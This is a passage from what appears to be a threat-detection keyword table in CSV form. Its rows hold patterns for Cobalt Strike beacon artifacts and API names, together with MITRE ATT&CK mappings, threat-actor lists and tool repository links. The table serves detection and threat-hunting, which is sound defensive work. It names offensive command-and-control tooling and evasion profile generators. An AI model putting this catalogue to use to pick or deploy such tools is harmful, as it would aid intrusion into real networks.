Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35681" "*beacon_remote_exec_method_describe*",".{0,1000}beacon_remote_exec_method_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt 
- Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35682" "*beacon_remote_exec_method_register*",".{0,1000}beacon_remote_exec_method_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35683" "*beacon_remote_exec_methods*",".{0,1000}beacon_remote_exec_methods.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35684" "*beacon_remote_exploit*",".{0,1000}beacon_remote_exploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35685" "*beacon_remote_exploit_arch*",".{0,1000}beacon_remote_exploit_arch.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and 
techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35686" "*beacon_remote_exploit_describe*",".{0,1000}beacon_remote_exploit_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35687" "*beacon_remote_exploit_register*",".{0,1000}beacon_remote_exploit_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35688" "*beacon_remote_exploits*",".{0,1000}beacon_remote_exploits.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35689" "*beacon_smb.exe*",".{0,1000}beacon_smb\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default artifact name generated by Cobalt Strike. Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35690" "*Beacon_Stage_p2_Stuct*",".{0,1000}Beacon_Stage_p2_Stuct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35691" "*beacon_stage_pipe*",".{0,1000}beacon_stage_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35692" "*Beacon_Stage_Struct_p1*",".{0,1000}Beacon_Stage_Struct_p1.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35693" "*Beacon_Stage_Struct_p3*",".{0,1000}Beacon_Stage_Struct_p3.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35694" "*beacon_stage_tcp*",".{0,1000}beacon_stage_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - 
Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35695" "*beacon_stage_tcp*",".{0,1000}beacon_stage_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
